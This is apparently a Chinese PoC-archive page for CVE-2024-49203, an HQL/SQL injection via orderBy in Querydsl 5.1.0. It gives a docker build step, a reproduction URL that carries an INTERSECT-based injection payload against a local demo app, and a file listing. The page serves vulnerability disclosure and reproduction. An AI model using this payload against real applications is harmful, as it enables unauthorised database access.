POC详情: cf15583991bae21812ca3d6a6f0dda8d26de5d8f

来源
https://github.com/CSIRTTrizna/CVE-2024-49203
关联漏洞
标题: Querydsl 安全漏洞 (CVE-2024-49203)
描述:Querydsl是Querydsl开源的一个框架,它支持为多个后端构建类型安全的类 SQL 查询。 Querydsl 5.1.0版本存在安全漏洞,该漏洞源于允许在JPAQuery中的orderBy中进行SQL或HQL注入。
介绍
Build
-----

```docker compose up -d```


Reproduce
---------
In browser go to 

```http://localhost:8000/products?orderBy=name+INTERSECT+SELECT+t+FROM+Test+t+WHERE+(SELECT+'2')='2'+ORDER+BY+t.id```
文件快照

 [4.0K]  /data/pocs/cf15583991bae21812ca3d6a6f0dda8d26de5d8f
├── [4.0K]  demo
│   ├── [ 429]  Dockerfile
│   ├── [ 10K]  mvnw
│   ├── [6.8K]  mvnw.cmd
│   ├── [2.2K]  pom.xml
│   └── [4.0K]  src
│       ├── [4.0K]  main
│       │   ├── [4.0K]  java
│       │   │   └── [4.0K]  com
│       │   │       └── [4.0K]  example
│       │   │           └── [4.0K]  demo
│       │   │               ├── [ 305]  DemoApplication.java
│       │   │               ├── [1.0K]  QTest.java
│       │   │               ├── [1.1K]  TestController.java
│       │   │               └── [ 651]  Test.java
│       │   └── [4.0K]  resources
│       │       └── [ 275]  application.properties
│       └── [4.0K]  test
│           └── [4.0K]  java
│               └── [4.0K]  com
│                   └── [4.0K]  example
│                       └── [4.0K]  demo
│                           └── [ 206]  DemoApplicationTests.java
├── [ 672]  docker-compose.yml
├── [4.0K]  postgres
│   └── [ 111]  init.sql
└── [ 199]  README.md

14 directories, 13 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。